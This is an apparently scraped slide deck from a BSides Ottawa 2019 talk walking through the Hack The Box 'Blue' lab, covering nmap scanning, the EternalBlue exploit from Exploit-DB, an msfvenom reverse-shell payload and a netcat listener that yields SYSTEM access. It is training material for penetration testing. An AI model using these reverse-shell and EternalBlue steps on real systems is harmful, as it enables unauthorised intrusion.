Download to read offline
More Related Content
Similar to BSides Ottawa 2019 - HTB Blue
BSides Ottawa 2019 - HTB Blue
- 2. WHOAMI • Diana Whitney •IT Security Specialist at EWA-Canada since 2015 • Payment Assurance Lab – PCI PTS POI Standards testing • Secure That Cert! CySA+ and PenTest+
- 3. RECONN WITH NMAP •nmap -sC -sV -O -oA initial 10.10.10.40 • -sC scans the target using the default Nmap scripts • -sV attempts to identify the version of services found running on open ports • -O attempts to ID the host’s operating systems • -oA outputs the scan results into a file called ‘initialscan’ • 10.10.10.40 is our target
- 4. • Port 139is open and running netbios-ssn • Port 445 is running Microsoft-ds • Ports 135, 49152-7 are running msrpc
- 5. Our scripts usedthe SMB protocol running on the open ports to lea more about the host: • OS – Windows 7 Pro • Security mode
- 6. MORE NMAP • Initialscan only scans the top 1000 ports • Adding -p- to the command tells nmap to scan all 65535 ports • To scan UDP ports instead of TCP ports • nmap -sU -O -p- -oA udpfull 10.10.10.40
- 7. NMAP VULNERABILITY SCRIPTS •nmap --script vuln -oA vulnerabilities 10.10.10.40 • Previous scan used nmap’s default scripts – fast and non invasive • Vulnerability scripts will look for any potential exploits on the open ports
- 8. • Script smb-vuln-ms17-010returned a positive result • Code execution vulnerability in MS SMBv1 servers • CVE-2017-0143 - EternalBlue
- 9. • Developed bythe NSA and leaked by Shadow Brokers hacker group in 2017 • Exploits SMBv1 protocol in unpatched Windows servers • Allows a remote attacker to execute arbitrary code on a vulnerable machine by sending specially crafted packets • Used in the WannaCry and NotPetya ransomware attacks of 2017 • CVE-2017-0143
- 10. • searchsploit --idms17-010 • Searchsploit is a command line search tool for Exploit-DB • Not using Metasploit • Searches for possible exploits for this vulnerability – we will use 42315
- 11. • searchsploit -m42315 • Mirrors the exploit onto our machine • 42315.py
- 12. LET’S EXAMINE THECONTENTS OF 42315.PY… • There will be a function call for ‘mysmb’ • We can get it from the provided URL using wget
- 13. • File willbe saved as 42315.py.1, since we already have a 42315.py • Change the filename: • mv 42315.py.1 mysmb.py
- 14. • The scriptrequires credentials in order to exploit the target • We find them using enum4linux • Since ‘none’ is an option, we can assume this machine allows us to log in with no username or password.
- 15. • Last weneed to modify the python code to add a payload • This will be the executable file we send to the target machine and have it run • To gain access to the target, we’ll send a payload that will set up a reverse shell request • Generate the payload using MSFVenom
- 16. • msfvenom -pwindows/shell_reverse_tcp -f exe LHOST=10.10.14.x LPORT=4444 > eternalblue.exe • -p – our payload – windows/shell_reverse_tcp • -f format – exe • LHOST – the IP address of our attack machine (local host) – 10.10.14.7 • Your IP address can be found on HTB ‘Access’ page, or by running ifconfig • LPORT – a port on our machine – we’ll use 4444 since it’s unlikely that it’s being used for anything else • eternalblue.exe – the executable file generated by this command
- 17. • Alter thescript to send eternalblue.exe from its location on the host machine to the target machine • Script will then execute eternalblue.exe on the target machine
- 18. • Use Netcatto set up a listener on the attacking machine • nc -nvlp 4444 • The attack machine is now listening for an incoming request from the target machine • Now run the python script • python 42315.py 10.10.10.40
- 19. WHEN the pythonscript runs successfully, the reverse shell request will be by the attack machine. We now have access to the target. Run ‘whoami’ in No privilege escalation required – EternalBlue has granted us system ac
- 20.